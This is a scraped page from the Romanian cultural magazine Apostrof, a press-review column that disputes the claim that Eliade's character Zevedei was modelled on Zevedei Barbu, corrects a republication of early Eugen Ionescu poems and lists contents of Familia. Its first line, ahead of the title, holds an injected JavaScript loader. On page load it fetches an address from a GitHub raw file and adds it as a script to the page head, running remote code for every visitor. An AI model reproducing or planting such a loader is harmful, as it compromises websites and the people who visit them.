;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Revista Apostrof | Revista Revistelor
 

Revista Revistelor

• În Scriptor, numărul pe iulie-august a.c., dna Elvira Sorohan scrie despre povestirea „Pelerina“ a lui Mircea Eliade. Şi dă ca sigur faptul că unul dintre personaje, Zevedei, ar fi nici mai mult nici mai puţin decît Zevedei Barbu. Dna Elvira Sorohan scrie: „nu întâmplător va fi preferat numele Zevedei, al purtătorului pelerinei. […]. Transilvăneanul Zevedei Barbu era un legionar exilat în America. În Jurnalul londonez al lui Ion Raţiu, sub anul 1971, Zevedei Barbu e amintit ca autor al unui compendiu despre fascismul în România, apărut în America“.

Ei bine, transilvăneanul Zevedei Barbu a fost comunist, asistent la Universitatea din Cluj, întîi la psihologie, apoi, ca asistentul lui Lucian Blaga, la filosofie. A fost şi secretarul general de redacţie al revistei lui Blaga, Saeculum, pînă în noiembrie 1943, cînd a fost arestat ca urmare a activităţii lui clandestine de comunist şi prins în procesul intelectualilor comunişti din anul 1943. Proces la care l-a avut ca avocat inclusiv pe Ioan Negoiţescu, tatăl scriitorului I. Negoiţescu, şi la care Lucian Blaga, disperat să îl salveze, a depus mărturie în favoarea lui, elogiindu-l superlativ. Istoricul Virgiliu Ţârău, care a reconstituit procesul pe baza documentelor (vezi: Virgiliu Ţârău, „Zevedei Barbu şi mişcarea comunistă. Idealism şi ilega­lism“, în Zevedei Barbu, psiholog…, 2015 ), apreciază că, prin felul cum a elogiat calităţile filosofice ale lui Zevedei Barbu, Blaga şi‑a salvat asistentul, aşa că Zevedei Barbu nu a fost condamnat la moarte, ca alţi doi inculpaţi, ci numai la opt ani şi jumătate de închisoare. Virgiliu Ţârău rezumă astfel rezultatul procesului:

„…cu unanimitate de voturi Curtea Marţială a emis sentinţa nr. 6030 a acestui proces. I‑a condamnat la moarte pe cei doi lideri ai orga­nizaţiei locale: Vasile Meţiu şi Etelka Deak. Au fost decise pedepse dure pentru alţi 19 membri ai acestei organizaţii, alţi 16 fiind achi­taţi. Zevedei Barbu, în urma performanţelor martorilor, a obţinut o pedeapsă mai blîndă, 8 ani şi 6 luni de închisoare corecţională, cu pierderea drepturilor profesionale. Schimbarea încadrării legale de la participare la activitate politică ilegală (art. 5, 6, 7 din L. 80/1941) la cea prevăzută de art. 24, potrivit căreia propaganda politică în şcoală era interzisă, a fost de asemenea o realizare a apărării sau a magistraţilor. În cuprinsul sentinţei, magistraţii mili­tari nu au reţinut decît activitatea de propagandă pentru strîngerea rîndurilor […]. Ca urmare, la 29 noiembrie a fost emis mandatul de întemniţare, iar la 7 decembrie comandantul Penitenciarului Caransebeş îl prelua în custodie – alături de alţi condamnaţi – pe condamnatul Zevedei Barbu, devenit din asistent universitar numă­rul matricol nr. 329/1943“.

Fireşte, biografia lui Zevedei Barbu nu se opreşte aici, a avut funcţii importante în regimul comunist în curs de instalare în România, apoi a fugit din ţară în împrejurări pe care le narează el însuşi, în autobiografia sa (tradusă de Michael Finkenthal).
Într-adevăr, Zevedei Barbu a studiat şi dreapta extremă europeană şi românească. Antologia Zevedei Barbu realizată de Marin Diaconu, autobiografia lui Zevedei Barbu, plus alte surse, pe care nu le mai menţionez, permit reconstituirea detaliată a biografiei şi orientării politice pe care le-a avut acest comunist abjurat. Aşa că personajul lui Eliade, dacă are vreun model, un altul decît Zevedei Barbu trebuie să aibă.

• În nr. 39 al revistei România literară, istoricul literar Mircea Coloşenco republică, cu o scurtă prezentare, opt gingaşe poeme de-ale lui Eugen Ionescu, din anii 1927-1928, neincluse de autor în „Elegii pentru fiinţe mici“ şi, deci, rămase în revistele şcolare. Nu-i chiar aşa, cele opt poeme au fost recuperate, toate, în volumul Eugen Ionescu, Eu, ediţie îngrijită de Mariana Vartic, cu un prolog la Englezeşte fără profesor de Gelu Ionescu şi un epilog de Ion Vartic, Cluj, Editura Echinox, 1990. Nu-i bai că reputatul istoric literar le-a republicat într-o revistă de azi, abia le mai citeşte cineva, noi semnalăm existenţa lor în Eu din scrupul pur filologic. În aceeaşi revistă, nr. 40, o cronică de Ana-Stanca Tabarasi-Hoffmann despre, surpriză, volumul de corespondenţă al fiicei lui Maiorescu, Lidia Dymsza-Maiorescu, cu Mihail Antoniade, volum alcătuit de Marin Diaconu şi recent publicat, printr-o colaborare intereditorială între Academia Română, Fundaţia Naţională pentru Ştiinţă şi Artă şi Muzeul Literaturii Române. Important. (R.-M. C.)

• În Familia, nr. 7-8, iulie-august 2021, sub genericul „Vara prozei noastre“, proză din belşug, de Radu Aldulescu, George Arion („Tokyo 2020“, prima de citit, deoarece poliţistă), Diana Bădica, Lavinia Branişte, Liliana Corobca, Simona Goşu, Alexandru Lamba, Andreea Răsuceanu, Adrian G. Romila, Ana Maria Sandu, Claudiu Soare, Daniel Timariu, Radu Ţuculescu. Un eseu de Alexandru Seres, „Cioran, pur şi simplu“, despre treimea de pseudonim a lui Cioran, ca să spun aşa, adică (ne)misterioasele iniţiale E.M., de fapt iniţiala M., pe care şi-a adăugat-o fiul preotului Emilian Cioran din Răşinari; Ioan Cioabă scrie despre invazia mongolă de-acum fix 780 de ani. Şi altele, demne de citit. (R.-M. C.)